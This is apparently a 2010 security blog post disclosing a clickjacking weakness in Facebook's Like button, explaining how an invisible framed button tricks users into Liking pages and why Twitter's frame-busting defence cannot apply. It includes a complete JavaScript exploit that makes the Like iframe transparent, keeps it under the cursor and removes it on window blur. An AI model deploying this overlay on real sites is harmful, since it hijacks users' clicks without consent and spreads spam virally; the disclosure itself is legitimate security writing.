Facebook Vulnerability: Like Clickjacking

07.13.10

The Facebook Open Graph Like button is susceptible to a type of attack known as clickjacking. In short, if the Like button is embedded on the page you’re on and made completely transparent, an attacker can trick you into Liking something without your knowledge or consent.

How the attack works:

1. The user navigates to the attacker’s page, where the Like button is embedded in an invisible iframe.
2. As the user moves the mouse, JavaScript keeps the button positioned beneath the cursor.
3. The user clicks what they believe is a link on the page and “Likes” the attacker’s content instead.
4. The user sees no notification of the Like, but it still generates a News Feed story.
5. The News Feed story points at the attacker’s content, so the attack spreads virally.

View Demo | View Source (button intentionally visible)

More advanced versions might use a cookie to detect a returning visitor and serve the ordinary, usable page, on the assumption that the Like was already captured on the first visit. Another refinement is to detect the moment the user clicks the invisible iframe (for example, by watching for the top window losing focus, which is what a click into a cross-origin frame looks like from the parent page) and remove the frame immediately, so browsing returns to normal without the user noticing. To my knowledge this works in IE and Firefox but not in Chrome, because of how Chrome isolates iframes. The demo above simply hides the button after 10 seconds and leaves it visible for effect.
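The following is an added example, not the source of the demo linked above. It implements the steps listed earlier (a fully transparent Like-button iframe that follows the cursor) together with the refinement of removing the frame once the parent window loses focus, which is the signal that the click landed inside the frame. The plugin URL, the button dimensions, the element styling and the timings are assumptions; the geometry and style helpers are kept separate from the DOM wiring so they can be checked outside a browser.

```javascript
// Added example (not the original demo's code). Plugin URL, button size and
// timings are assumptions chosen for illustration.

const LIKE_PLUGIN_URL =
  'https://www.facebook.com/plugins/like.php?href=' +
  encodeURIComponent('https://attacker.example/'); // assumed attacker content

// Approximate size of the Like button's clickable area (assumed).
const BUTTON = { width: 50, height: 20 };

// Top/left that puts the centre of the button directly under the cursor.
function positionOverlay(cursor, button = BUTTON) {
  return {
    left: Math.round(cursor.x - button.width / 2),
    top: Math.round(cursor.y - button.height / 2),
  };
}

// Inline style for the overlay. opacity:0 keeps the frame clickable;
// display:none or visibility:hidden would stop it receiving the click.
function overlayStyle(pos, visible = false, button = BUTTON) {
  return [
    'position:absolute',
    `left:${pos.left}px`,
    `top:${pos.top}px`,
    `width:${button.width}px`,
    `height:${button.height}px`,
    'border:0',
    'z-index:2147483647',
    `opacity:${visible ? 1 : 0}`,
  ].join(';');
}

// Wire the overlay into a real document. doc/win are parameters so nothing
// touches the DOM at load time when no browser is present.
function installOverlay(doc, win, { visible = false, hideAfterMs = 10000 } = {}) {
  const frame = doc.createElement('iframe');
  frame.src = LIKE_PLUGIN_URL;
  frame.setAttribute('scrolling', 'no');
  // Start off-screen until the first mouse movement arrives.
  frame.setAttribute('style', overlayStyle(positionOverlay({ x: -1000, y: -1000 }), visible));
  doc.body.appendChild(frame);

  const remove = () => {
    if (frame.parentNode) frame.parentNode.removeChild(frame);
  };

  // Step 2: keep the button under the cursor as the mouse moves.
  doc.addEventListener('mousemove', (e) => {
    const pos = positionOverlay({ x: e.pageX, y: e.pageY });
    frame.style.left = pos.left + 'px';
    frame.style.top = pos.top + 'px';
  });

  // Refinement: a click into a cross-origin iframe moves focus out of the top
  // document, firing blur on the parent window. Treat that as "the Like was
  // clicked" and remove the frame so the page behaves normally afterwards.
  win.addEventListener('blur', remove);

  // Demo behaviour: give up after a fixed time so the page stays usable.
  win.setTimeout(remove, hideAfterMs);
  return frame;
}

// Only run in a browser; the helpers above stay testable elsewhere.
if (typeof document !== 'undefined' && typeof window !== 'undefined') {
  installOverlay(document, window, { visible: false });
}
```

Setting `visible: true` reproduces the linked demo's "button intentionally visible" mode, which is the easiest way to confirm the frame really does track the cursor before making it transparent.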

Twitter ran into a very similar attack in February 2009 with the propagation of a “Don’t Click” button. The main difference is that Twitter was able to close the hole by refusing to be embedded in an iframe: its pages check whether they are being framed (if window.top !== window.self, the page is being loaded inside someone else’s iframe, presumably with bad intent) and break out. Since the Like button is itself an iframe that publishers are meant to embed, Facebook can’t apply the same logic to detect clickjacking: from inside the button’s frame, a legitimate publisher and an attacker look identical.
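To make the asymmetry concrete, here is an added example (not Twitter’s or Facebook’s code) of the frame-busting check described above, written against window-like objects so it can be exercised outside a browser. The mock windows are constructed for illustration; the only real browser detail relied on is that a framed document sees `window.top !== window.self` and may assign `top.location.href` even across origins.

```javascript
// Added example, not the code of either site. The mock window objects are
// constructed here purely to exercise the logic.

// Twitter-style check: true when this document is not the top-level one.
function isFramed(win) {
  return win.top !== win.self;
}

// The usual response: navigate the top window to this page, escaping the frame.
// Assigning top.location.href is permitted cross-origin. Returns whether it fired.
function bustFrame(win) {
  if (!isFramed(win)) return false;
  win.top.location.href = win.self.location.href;
  return true;
}

// Build a minimal window-like object. If `parent` is given, the object models a
// document loaded inside that window's iframe.
function makeWindow(href, parent) {
  const w = { location: { href } };
  w.self = w;
  w.top = parent ? parent.top : w;
  return w;
}

// Compare the two situations the post contrasts: a page that should never be
// framed versus a widget that is always framed, each with a benign and a
// malicious host. The check is useful only where the answers differ.
function compareScenarios() {
  const attacker = makeWindow('https://attacker.example/');
  const publisher = makeWindow('https://publisher.example/article');

  const twitterDirect = makeWindow('https://twitter.com/');
  const twitterFramed = makeWindow('https://twitter.com/', attacker);

  const likeOnPublisher = makeWindow('https://www.facebook.com/plugins/like.php', publisher);
  const likeOnAttacker = makeWindow('https://www.facebook.com/plugins/like.php', attacker);

  return {
    // Twitter: direct visit is unframed, attack page is framed -> distinguishable.
    twitter: { direct: isFramed(twitterDirect), attacked: isFramed(twitterFramed) },
    // Like button: framed in both cases -> the check cannot tell them apart.
    likeButton: { legitimate: isFramed(likeOnPublisher), attacked: isFramed(likeOnAttacker) },
  };
}
```

The `likeButton` result is the whole problem in one line: both embeddings report framed, so any "am I framed?" test would break the button for every honest publisher as well.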

An attentive user might notice the cursor: it shows the hand pointer wherever the mouse goes, because the cursor is always over a link inside the iframe, and the attacker’s page cannot override the cursor style of a cross-origin frame. In the casual flow of browsing, though, this would hardly be noticed.

Creative Commons License All original content is licensed under the Creative Commons Attribution 3.0 U.S. License except that which is quoted or attributed to others. You may reproduce or modify this content, but you must provide proper attribution.